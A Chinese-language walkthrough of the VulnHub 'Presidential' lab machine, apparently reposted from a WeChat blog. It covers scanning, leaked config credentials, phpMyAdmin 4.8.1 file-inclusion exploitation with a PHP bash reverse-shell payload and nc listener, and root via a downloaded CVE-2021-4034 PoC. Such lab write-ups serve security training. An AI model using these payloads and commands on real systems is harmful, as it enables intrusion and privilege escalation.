vulnhub之Presidential的实践

admin 2023年3月20日00:16:05评论66 views字数 1313阅读4分22秒阅读模式

今天实践的是vulnhub的Presidential镜像,

下载地址,https://download.vulnhub.com/presidential/Presidential.ova,

用workstation导入,做地址扫描,sudo netdiscover -r 192.168.58.0/24,

187就是靶机,

vulnhub之Presidential的实践

继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.187,

vulnhub之Presidential的实践

有web服务,浏览器访问http://192.168.58.187,

猜测192.168.58.187对应的域名是votenow.local,

vulnhub之Presidential的实践

做php路径扫描,dirb http://192.168.58.187 -X .php,.php.bak,

vulnhub之Presidential的实践

浏览器访问http://192.168.58.187/config.php.bak,查看页面源码,

vulnhub之Presidential的实践

获取到用户名密码votebox/casoj3FFASPsbyoRP,

本地hosts文件添加192.168.58.187       votenow.local,

做子域名的扫描,

gobuster vhost --append-domain -u votenow.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | grep "Status: 200"

vulnhub之Presidential的实践

本地hosts文件再添加192.168.58.187       datasafe.votenow.local,

浏览器访问http://datasafe.votenow.local,

vulnhub之Presidential的实践

确认到应用信息phpmyadmin 4.8.1,搜索可利用的漏洞,

聚焦到一个文件包含漏洞,获取到利用方法,

vulnhub之Presidential的实践

提交select '<?php system("bash -i >& /dev/tcp/192.168.58.188/4444 0>&1");exit;?>',

vulnhub之Presidential的实践

查询cookie填到url中,kali攻击机上开个反弹shell监听,nc -lvp 4444,

浏览器访问http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_qk9ji8g6c1iupcko6df5nn5g8a8779pt,

反弹shell这就过来了,不是root,需要提权,

vulnhub之Presidential的实践

上传linpeas.sh文件,

wget https://github.com/carlospolop/PEASS-ng/releases/download/20230319/linpeas.sh,

vulnhub之Presidential的实践

获取到可利用的漏洞,CVE-2021-4034,

vulnhub之Presidential的实践

从网上找到可用的poc文件,

wget https://github.com/EstamelGG/CVE-2021-4034-NoGCC/releases/download/v4.0/cve-2021-4034-poc-64,

执行poc文件,id确认是root,

vulnhub之Presidential的实践


原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Presidential的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月20日00:16:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之Presidential的实践https://cn-sec.com/archives/1614842.html

发表评论

匿名网友 填写信息